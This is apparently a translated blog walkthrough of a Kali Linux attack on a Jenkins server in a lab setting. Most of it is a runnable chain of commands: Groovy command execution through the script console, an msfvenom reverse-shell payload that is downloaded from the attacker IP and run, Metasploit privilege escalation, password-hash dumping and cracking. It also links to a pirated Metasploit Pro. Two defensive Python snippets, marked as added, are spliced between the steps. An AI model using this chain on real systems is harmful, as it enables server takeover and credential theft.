[Video walkthrough] Getting Started with Kali Linux: How to Crack Passwords

Author: FancyPig | Published: | Updated:

Related reading

Previous video

Linked post: [Video walkthrough] Common techniques and approaches that penetration-testing beginners should master (FancyPig)

Password cracking related content

The earlier hashcat tutorial from NetworkChuck

Linked post: [Video tutorial] How to crack passwords efficiently and elegantly? hydra and Hashcat are worth having! (FancyPig)

Piggy also followed up with a hashcat supplement showing how to crack Office document passwords with hashcat

Linked post: How to crack Office document passwords with hashcat? (FancyPig)

Reverse shell

Linked post: How do hackers remotely control a computer or server? Get to know the reverse shell! (FancyPig)

Tools and environment setup

Linked post: Kali Linux latest version: installation guide and FAQ (FancyPig)

You can use the Metasploit framework that ships with Kali Linux, or install it on Windows (the former is recommended).

Linked post: Metasploit Pro 2022 latest professional activated/cracked edition, worth $15,000 (FancyPig)

Video walkthrough

This episode uses the Jenkins script-execution vulnerability as an example to show how to obtain a reverse shell from the script console, escalate privileges, dump the password hashes, and finally crack them with John the Ripper.

Written walkthrough

Reconnaissance with Nmap

We can try scanning a whole subnet or a single IP address

Linked post: How to run a full-port scan of a subnet with Nmap (FancyPig)

Of course, if time and performance are not a concern, you can also simply run

nmap 192.168.0.110

Background: Jenkins

Jenkins is the leading open-source CI/CD software, offering more than 1000 plugins to support building, deploying and automating any project.

Jenkins is an open-source software platform

We browse to the /script path of Jenkins

Here we see a script console, a place for debugging scripts, where a script can be entered

For example, we enter

println new ProcessBuilder("cmd.exe","/C whoami").redirectErrorStream(true).start().text

and the returned value is

nt authority\local service

This proves the script executed successfully and returned the user context that whoami shows in cmd on the Windows machine. You can also replace whoami with ipconfig to see the machine's network and routing information.
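From the defender's side, every request to the script console leaves a trace: Jenkins' built-in access logger writes NCSA-style lines, and any hit on /script or /scriptText is worth alerting on. The following Python is an added example, not part of the original post: it parses constructed sample log lines and reports who reached the script console and whether Groovy actually ran (a POST answered with a 2xx status); the log format, hostnames and sample entries are assumptions.

```python
import re

# Constructed sample lines in the NCSA combined format written by Jenkins'
# built-in access logger (winstone SimpleAccessLogger); not real log data.
SAMPLE_LOG = """\
192.168.0.192 - admin [19/Dec/2021:10:15:02 +0800] "GET /script HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.192 - admin [19/Dec/2021:10:15:40 +0800] "POST /script HTTP/1.1" 200 6211 "http://192.168.0.110:8080/script" "Mozilla/5.0"
192.168.0.55 - - [19/Dec/2021:10:16:01 +0800] "POST /scriptText HTTP/1.1" 403 980 "-" "curl/7.79.1"
192.168.0.33 - dev1 [19/Dec/2021:10:17:09 +0800] "GET /job/build-app/lastBuild/console HTTP/1.1" 200 14021 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# /script is the console's HTML form; /scriptText is the same console for
# non-browser clients. A Jenkins context path (e.g. /jenkins) may precede them.
SCRIPT_CONSOLE_PATHS = ("/script", "/scriptText")

def parse_access_log(text: str) -> list[dict]:
    """One dict per well-formed line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]

def script_console_hits(text: str) -> list[dict]:
    """Every request to the script console, with 'executed' set on the ones
    that actually ran Groovy (a POST answered with a 2xx status)."""
    hits = []
    for rec in parse_access_log(text):
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if not path.endswith(SCRIPT_CONSOLE_PATHS):
            continue
        rec["executed"] = rec["method"] == "POST" and rec["status"].startswith("2")
        hits.append(rec)
    return hits

def executions_by_actor(text: str) -> dict[tuple[str, str], int]:
    """Count successful executions per (client IP, Jenkins user) for alerting."""
    counts: dict[tuple[str, str], int] = {}
    for h in script_console_hits(text):
        if h["executed"]:
            key = (h["ip"], h["user"])
            counts[key] = counts.get(key, 0) + 1
    return counts

if __name__ == "__main__":
    for h in script_console_hits(SAMPLE_LOG):
        print(h["ip"], h["user"], h["method"], h["path"], h["status"],
              "EXECUTED" if h["executed"] else "")
    print(executions_by_actor(SAMPLE_LOG))
```

A 403 on /scriptText from an unauthenticated client (third sample line) is still worth a look: it shows someone probing for the console even though it was denied.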

We can now extend the experiment further using the Metasploit framework:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=4321 -f exe > hackerloix64.exe

We can download the exe we just generated through the Jenkins script console and see what else becomes possible!

We download the file with a command

Then start the Metasploit framework

sudo msfconsole

Then set up the listener

use exploit/multi/handler

Set the matching payload

set payload windows/x64/meterpreter/reverse_tcp

Then set the IP and port

set LHOST 192.168.0.192
set LPORT 4321

Finally, run it

run

Then, back in the Jenkins script console from before, enter the script and click Run

  • Download script
println new ProcessBuilder("powershell.exe","Invoke-WebRequest -Uri 'http://192.168.0.192:80/hackerloix64.exe' -OutFile 'C:\\Program Files\\jenkins\\Scripts\\hackerloix64.exe'").redirectErrorStream(true).start().text
  • Execution script (if the file is already downloaded, you can run it directly)
println new ProcessBuilder("C:\\Program Files\\jenkins\\Scripts\\hackerloix64.exe").redirectErrorStream(true).start().text

Once it runs, the listener shows a session connected to the Windows machine, and we can enter commands, for example

getuid
Enter getuid to show the user the session is running as

You can also enter

getprivs
Enter getprivs to list the privileges the current user holds

Privilege escalation

We find that these privileges are insufficient to dump the password hashes, so we need to escalate

Enter the following commands

sessions -i 1
ps

and see whether migrating into another process gains us privileges

migrate 488

That does not work either.

So we turn to Metasploit's local exploit suggester

use post/multi/recon/local_exploit_suggester
set SESSION 1
run -j

It reports a likely exploitable vulnerability! Copy exploit/windows/local/cve_2019_1458_wizardopium and enter the following command

use exploit/windows/local/cve_2019_1458_wizardopium

Enter show options to check; if the IP and port are not set, set them

set LHOST 192.168.0.192
set LPORT 4444

Since we already set them earlier, we skip this step here

Then enter the following commands

set SESSION 1
run -j

We see that session 2 has been opened

Enter sessions to list them: the new session no longer runs as Local Service but as SYSTEM

Now we can dump the password hashes

use post/windows/gather/hashdump
set SESSION 2
run

Password cracking

What do we do with all these hashes?

Save the hashes above to a file named tobecracked.txt
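The hashdump module writes pwdump-format lines (user:RID:LM hash:NT hash:::), which is what tobecracked.txt contains. As an added example that is not part of the original post, the Python below triages such a dump the way a defender auditing their own hosts would, before any cracking is attempted: it flags empty passwords, LM hashes that are still stored, and accounts sharing one NT hash. The sample records are constructed and their hash values are made up; only the two empty-password constants are real, well-known values.

```python
from collections import defaultdict

# Well-known hash values of an empty password (real constants, not taken from the page).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the pwdump format that post/windows/gather/hashdump
# writes (user:RID:LM:NT:::). All LM and NT values other than the empty-password
# constants are made up and correspond to no real password.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1001:5d6e9c4b1a2f3e0d7c8b9a0f1e2d3c4b:fedcba9876543210fedcba9876543210:::
"""

def parse_pwdump(text: str) -> list[dict]:
    """Parse account records; skip blank lines and hashdump's '[*]' status output."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # not a user:RID:LM:NT record
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def audit(text: str) -> dict[str, list]:
    """Flag what should be fixed before anyone runs john over the dump:
    empty passwords, LM hashes still stored, one password reused across accounts."""
    findings: dict[str, list] = {"empty_password": [], "lm_hash_stored": [], "shared_password": []}
    by_nt: dict[str, list[str]] = defaultdict(list)
    for a in parse_pwdump(text):
        if a["nt"] == EMPTY_NT:
            findings["empty_password"].append(a["user"])
        if a["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(a["user"])  # LM hashes are trivially crackable
        by_nt[a["nt"]].append(a["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:  # identical NT hash means identical password
            findings["shared_password"].append(sorted(users))
    return findings

if __name__ == "__main__":
    for kind, users in audit(SAMPLE_DUMP).items():
        print(f"{kind}: {users}")
```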

Then crack them with John the Ripper

john --format=NT ./tobecracked.txt

Then display the cracked results

john --format=NT ./tobecracked.txt --show

Here we see that the account name and its password are both vagrant

To verify that the credentials are correct, we connect to 192.168.0.110 over SSH

ssh vagrant@192.168.0.110

Then type the password at the hidden prompt (Linux does not echo **** while you type a password, so don't assume nothing is being entered).

The connection succeeds.

That's the end of this episode! Remember to get rid of weak passwords and switch to stronger ones!

Tags: kali, kali linux, metasploit, hashcat, password dictionary, metasploit framework, john, john the ripper, cracking passwords with hashcat, thoughts on cracking passwords with john, john cracks passwords too slowly, kali getting started, kali tutorial, kali beginner tutorial, kali from beginner to prison, Jenkins, password dictionary generation